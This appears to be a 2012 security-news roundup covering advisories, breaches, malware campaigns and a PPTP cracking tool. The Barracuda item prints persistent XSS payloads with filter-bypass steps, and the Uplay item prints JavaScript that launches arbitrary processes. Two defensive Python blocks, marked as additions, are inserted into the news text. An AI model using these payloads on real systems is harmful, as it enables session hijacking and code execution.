
CVE-2012-2665: LibreOffice vulnerable to multiple Heap-based buffer overflows


CVE-2012-2665: A few weeks after releasing LibreOffice 3.5.5, The Document Foundation has confirmed security holes in earlier versions of the open source LibreOffice suite.

According to the security advisory, multiple heap-based buffer overflow flaws were found in the XML manifest encryption tag parsing code of LibreOffice.

An attacker could create a specially-crafted file in the Open Document Format for Office Applications (ODF) format which when opened could cause arbitrary code execution.

Versions up to and including LibreOffice 3.5.4 are affected; users are advised to upgrade to version 3.5.5 or 3.6.0.

Opera 12.01 addresses Critical vulnerabilities in previous versions

The Opera team has released an updated version 12 of the Opera web browser that addresses four important security holes. The first of these is rated critical by the company and affects all supported platforms.

According to Opera, certain URL constructs can cause the browser to allocate an incorrect amount of memory for storing the address; an attacker can exploit this to overwrite unrelated memory with malicious data, possibly leading to the execution of arbitrary code.

Opera 12.01 also addresses two high-severity errors that could have led to cross-site scripting (XSS) attacks when handling certain DOM elements and HTML characters.

A third high-severity problem, which could have resulted in a malicious file being downloaded and executed, has also been fixed; it relied on tricking a victim into clicking a hidden dialog box or entering a specific keyboard sequence.

Versions up to and including 12.0 are affected; upgrading to 12.01 corrects these problems.

1,100 UK computers infected by Police Ransomware



Cyber criminals have managed to infect more than 1,100 computers with ransomware that extorts money from unsuspecting members of the public by impersonating the Met's Police Central e-Crime Unit (PCeU).

According to the press release, police have received 1,100 reports from the public of the malware affecting their computers. 36 people in the UK have paid, each losing £100.

The ransomware infects PCs after users visit infected websites; it freezes and locks the PC and displays a message purporting to be from the e-Crime Unit, advising the user that they are required to pay a fine to unlock the computer.

"This is a fraud and users are advised NOT to pay out any monies or hand out any bank details," police representatives said. "This scam is now affecting many countries in Europe and further afield, with each email tailored to include the branding of that country's law enforcement agency. Europol are coordinating with Europe's law enforcement agencies on this matter."

Users are advised to install Internet security software. You can also use the Comodo IceDragon browser, which blocks malicious domains.

Call For Papers for the first edition of Hzine


Hcon, an information security training and tools provider, has launched its own pentesting magazine, 'Hzine'. We are inviting unique and interesting articles for the first edition of Hzine.

Theme for the articles: Operating Systems (OS)

Articles can be on these topics:
1. Penetration testing / hacking
2. Forensics
3. Malware
4. Exploit development
5. Embedded and mobile OS
6. OS configuration and defenses
7. Offensive or defensive programming
8. OS tools, or any OS-specific article
9. Troubleshooting any security issue
10. Any other OS-related quality article is also welcome

Things to consider for article submission:
1. It will be a free magazine
2. It has to be your own work or research
3. It has to be in ENGLISH only
4. As we are not making any money from it, don't expect us to give you
5. Send articles in document format only (doc, docx, odt)
6. Articles must include references where needed

Submit your articles via this contact form.

Dropbox confirms it was hacked -Two-Factor Authentication Coming


When a few hundred Dropbox users began receiving spam emails about online casinos and gambling sites two weeks ago, it seemed like something was up. And indeed there was.

The online file storage service confirmed today that hackers obtained usernames and passwords from third-party sites and then used them to get into Dropbox users' accounts.

"Our investigation found that usernames and passwords recently stolen from other websites were used to sign in to a small number of Dropbox accounts. We've contacted these users and have helped them protect their accounts," Aditya Agarwal, the company's director of engineering, wrote in a post on the Dropbox website.

"A stolen password was also used to access an employee Dropbox account containing a project document with user email addresses. We believe this improper access is what led to the spam."

Agarwal said that Dropbox will now offer two-factor authentication for members, giving the option of requiring two forms of identification before access to an account is granted. He said the company was also adding new automated systems to monitor suspicious activity and a new page allowing members to see all active logins on their account.

He added: "At the same time, we strongly recommend you improve your online safety by setting a unique password for each website you use. Though it’s easy to reuse the same password on different websites, this means if any one site is compromised, all your accounts are at risk."

Multiple Web Vulnerabilities found in Barracuda EMail Security 2.0.2

Vulnerability-Lab has discovered a filter bypass vulnerability and two persistent input validation vulnerabilities in the Barracuda Email Security application UI v2.0.2.

The vulnerabilities allow a remote attacker to bypass the input validation and exception handling and inject or display persistent malicious content on the application side.

The first vulnerability is located in the Domain Settings > Directory Services > LDAP Host module, in the vulnerable bound-name parameter. The second persistent vulnerability is located in the Reports module, in the vulnerable bound start date and end date parameters.

Exploitation requires low user interaction and a privileged application user account. Successful exploitation of the vulnerability can lead to session hijacking (admin) or stable (persistent) context manipulation.

Vulnerability-Lab provided us with the proof-of-concept for the two vulnerabilities. Here it is:

PoC for the first vulnerability:

Review: Domain Settings > Directory Services > LDAP Host

<div id="directory-services" class="module">
<h4 class="module-title">Directory Services</h4>
<div class="module-content">
<div class="warn notice" id="ldap-test-result" style=""><img src="/images/spinner1.gif"
alt="loading..."> Connecting to >"<iframe src="http://global-evolution.info">@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0</iframe></div>
<div style="float: right;">
<a href="https://ess.barracudanetworks.com/domains/sync_ldap/4" class="btn"><span><span>Synchronize Now</span></span></a>
<a href="#" class="btn" id="ldap-test-btn"><span><span>Test Settings</span></span></a>
</div>
<p class="field">
<label class="label" for="ldap_host">LDAP Host:</label>
<input name="ldap_host" id="ldap_host" size="30" value=">
"<iframe src=http://global-evolution.info>@gmail.com >"<script>alert(document.cookie)</script><
div style="1@gmail.com 0" type="text">

URL: https://ess.127.0.0.1:1338/domains/info/4

PoC: >">"<iframe src=http://global-evolution.info>VL >"<div style="1 >">"

Note:
To bypass the validation, close the tag of the exception handling at the beginning with double quotes twice.
The mask of the exception (>") will be bypassed and the string will be executed outside the secured exception handling message.

PoC for the second vulnerability:
The persistent web vulnerability can be exploited by remote attackers with a privileged user account and low user interaction.
For demonstration or to reproduce ...

Vulnerable Module: Reports > Date Start > Date End

PoC: >"<iframe src=http://global-evolution.info>

URL: https://ess.127.0.0.1:1338/reports

Note:
1. Include a start date and an end date
2. Inject your own persistent script code after the start date and end date
3. Result: the script code gets executed outside the date listing application context
4. Save the value with script code to events for exploitation via the module

2012-06-20: Researcher Notification & Coordination
2012-06-23: Vendor Notification
2012-07-01: Vendor Response/Feedback
2012-07-24: Vendor Fix/Patch
2012-08-01: Public or Non-Public Disclosure

The researcher estimates the vulnerability risk level as medium. Vulnerability-Lab informed the official vendor about the vulnerability; they successfully patched it and released BESS version 2.04.
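A defensive counterpart to the two findings above, added here and not part of the advisory or Barracuda's code: allowlist validation for the LDAP host and the report dates, plus contextual HTML encoding of whatever the UI echoes back, checked against the advisory's own PoC strings. The hostname pattern and the `render_ldap_notice` markup are assumptions made for illustration.

```python
import html
import re
from datetime import datetime

# PoC strings copied from the advisory above; used here only as test input.
LDAP_HOST_POC = '>">"<iframe src=http://global-evolution.info>VL >"<div style="1 >">"'
DATE_POC = '>"<iframe src=http://global-evolution.info>'

# Assumed allowlist: RFC 1123-style hostname (labels of letters, digits, hyphens).
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$')

# Matches the element names a browser would parse out of a piece of markup.
TAG_RE = re.compile(r'<\s*/?\s*([A-Za-z][A-Za-z0-9]*)')


def validate_ldap_host(value):
    """Allowlist validation: return the value only if it is a well-formed hostname."""
    return value if HOSTNAME_RE.match(value) else None


def validate_date(value):
    """Accept only ISO dates (YYYY-MM-DD) for the report range; return canonical form or None."""
    try:
        return datetime.strptime(value, "%Y-%m-%d").strftime("%Y-%m-%d")
    except ValueError:
        return None


def render_ldap_notice(host):
    """Output encoding: the same untrusted value is escaped for both the element-text
    context (the 'Connecting to ...' notice) and the attribute context (the input value).
    html.escape with quote=True neutralises <, >, & and both quote characters, so the
    '>"' trick that closed the masked message no longer leaves the string context."""
    safe = html.escape(host, quote=True)
    return (f'<div class="warn notice">Connecting to {safe}</div>\n'
            f'<input name="ldap_host" id="ldap_host" value="{safe}" type="text">')


def tags_in(markup):
    """Return the set of element names present in the rendered markup; with correct
    encoding only the template's own elements should appear."""
    return {m.group(1).lower() for m in TAG_RE.finditer(markup)}
```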


#Blackmuscats: Hacked sites redirected to fake antivirus site

Today many sites were compromised with the Blackmuscats conditional redirection, says Sucuri. Anyone visiting the hacked sites is redirected to fake antivirus sites.

Researchers named this campaign Blackmuscats because all the compromised sites have .htaccess redirections pointing to a URL ending in "blackmuscats?5".

Note that this is a conditional redirection, so you are only sent to the malware site if you are coming from a search engine, not if you visit the site directly.

"If someone visits a compromised site by clicking on a search engine results page, you will be sent to one of those domains we listed above and then to www1.antivirusworrydanger.pl (and similar AV related domains)," the researcher says.
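The conditional redirection described above can be spotted by reading a site's .htaccess for rewrite rules that fire only on a search-engine Referer and send the visitor off-site. The scanner below is an added example, not Sucuri's tooling; both .htaccess samples are constructed, and the redirect host is a placeholder.

```python
import re

# Constructed sample resembling the conditional redirection described above
# (not taken from a real compromised site; the host is a placeholder).
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.*
RewriteRule ^(.*)$ http://redirect.invalid/blackmuscats?5 [R=301,L]
"""

# Constructed legitimate rewrite block (force HTTPS) that must not be flagged.
CLEAN_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
"""

SEARCH_ENGINES = ("google", "bing", "yahoo", "ask", "aol")
COND_RE = re.compile(r'^\s*RewriteCond\s+(\S+)\s+(\S+)', re.I)
RULE_RE = re.compile(r'^\s*RewriteRule\s+\S+\s+(https?://\S+)', re.I)


def find_conditional_redirects(htaccess_text):
    """Return (referer_patterns, target_url) for each RewriteRule that redirects to an
    external URL and is guarded by RewriteCond lines testing the Referer for a search engine."""
    findings = []
    referer_patterns = []  # Referer conditions seen since the last RewriteRule
    for line in htaccess_text.splitlines():
        cond = COND_RE.match(line)
        if cond:
            if cond.group(1).upper() == "%{HTTP_REFERER}":
                referer_patterns.append(cond.group(2))
            continue  # conditions chain until the next RewriteRule
        rule = RULE_RE.match(line)
        if rule:
            engines = [p for p in referer_patterns
                       if any(e in p.lower() for e in SEARCH_ENGINES)]
            if engines:
                findings.append((engines, rule.group(1)))
            referer_patterns = []
        elif line.strip() and not line.lstrip().startswith("#"):
            referer_patterns = []  # any other directive ends the condition chain


    return findings


def is_blackmuscats(htaccess_text):
    """True if a search-engine-conditional redirect points at the campaign's marker."""
    return any("blackmuscats?5" in url
               for _, url in find_conditional_redirects(htaccess_text))
```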

Vulnerability in Ubisoft Uplay allows attackers to gain control of your computer



Google security researcher Tavis Ormandy has discovered a critical vulnerability in the Ubisoft Uplay browser plugin that could allow hackers to remotely install programs on your PC.

It is possible for attackers to use a few lines of JavaScript to persuade the plugin to launch arbitrary processes; the potential victim only needs to open a specially crafted web page.

"While on vacation recently I bought a video game called 'Assassin's Creed Revelations,'" he posted on the Full Disclosure mailing list. "I noticed the installation procedure creates a browser plugin for its accompanying Uplay launcher, which grants unexpectedly (at least to me) wide access to websites."

The JavaScript code that exploits the vulnerability:
var x = document.createElement('OBJECT');

x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Here is a proof-of-concept page where users can check whether their system is vulnerable: the page attempts to start the Windows Calculator.

Ubisoft has fixed the security flaw.

"We have made a forced patch to correct the flaw in the browser plug-in for the Uplay PC application that was brought to our attention earlier today. We recommend that all Uplay users update their Uplay PC application without a Web browser open. This will allow the plug-in to update correctly. An updated version of the Uplay PC installer with the patch also is available from Uplay.com," the Ubisoft statement reads.

"Ubisoft takes security issues very seriously, and we will continue to monitor all reports of vulnerabilities within our software and take swift action to resolve such issues."

Tools released at Defcon can crack widely used PPTP encryption in under a day

Security researchers released two tools at the Defcon security conference which can be used to crack the encryption of any PPTP (Point-to-Point Tunneling Protocol) session, as well as WPA2-Enterprise (Wi-Fi Protected Access) sessions, that uses MS-CHAPv2 for authentication.


MS-CHAPv2 is an authentication protocol created by Microsoft and introduced in Windows NT 4.0 SP4. Despite its age, it is still used as the primary authentication mechanism by most PPTP virtual private network (VPN) clients.

ChapCrack can take captured network traffic that contains an MS-CHAPv2 handshake (from a PPTP VPN or a WPA2-Enterprise session) and reduce the handshake's security to a single DES (Data Encryption Standard) key.


This DES key can then be submitted to CloudCracker.com, a commercial online password cracking service that runs on a special FPGA cracking box developed by David Hulton of Pico Computing, where it will be cracked in under a day.


The CloudCracker output can then be used with ChapCrack to decrypt an entire session captured with Wireshark or similar network sniffing tools.


PPTP is commonly used by small and medium-size businesses (large corporations use other VPN technologies, such as those provided by Cisco), and it is also widely used by personal VPN service providers, Marlinspike said.


The researcher gave the example of IPredator, a VPN service from the creators of The Pirate Bay, which is marketed as a solution to evade ISP tracking, but only supports PPTP.


Marlinspike's advice to businesses and VPN providers was to stop using PPTP and switch to other technologies like IPsec or OpenVPN. Companies with wireless network deployments that use WPA2 Enterprise security with MS-CHAPv2 authentication should also switch to an alternative.

Team Poison hacker who leaked Tony Blair's data is jailed

A UK teenage hacker who stole private information belonging to former British Prime Minister Tony Blair, and clogged up the UK's national anti-terrorism telephone hotline, has been jailed for six months.

Junaid Hussain, 17 and of Birmingham, the leader of the Team Poison group, broke into the Gmail account of Blair aide Katie Kay and stole information including Tony Blair's address and phone book, containing email addresses, phone numbers and postal addresses for Blair's family, friends and MPs.

When Hussain was arrested in April, a Facebook chat window on his computer bragged of "hacking a number of different people and organisations, including Tony Blair".

Hussain was duly sentenced to six months in prison.

"Hussain's actions were foolish and irresponsible," said detective inspector Stewart Garrick of the Police Central E-crime Unit.

"Today's sentencing emphasises the seriousness of his offence and should act as a deterrent to anyone else who feels that they can act in such a manner."

Fake Groupon discount emails carry Trojan

Sophos security researchers have spotted new spam emails with the subject "Groupon discount gifts".

The emails, which have the poorly spelt subject line "Groupon dicount gifts" (in itself something which should ring alarm bells), pretend to come from Groupon and claim that one of your friends has found a deal on the website.

The website says that your friend has decided to share the deal with you, and that you are receiving a discount code as a result.

Part of the email reads:

Hi there!
You're going to love it
We are glad to inform you that one of your friends has found a great deal on Groupon.com!
And even shared it with you!

Yeah! Now Groupon.com gives an opportunity to share a discount gift with a friend!
Enjoy your discount gift in the attachement and share it with one of your friend as well.

All the details in the file attached. be in a hurry this weekend special is due in 2 days!

Attached to the emails is a file called Gift coupon.zip, which contains a Trojan horse designed to infect Windows computers.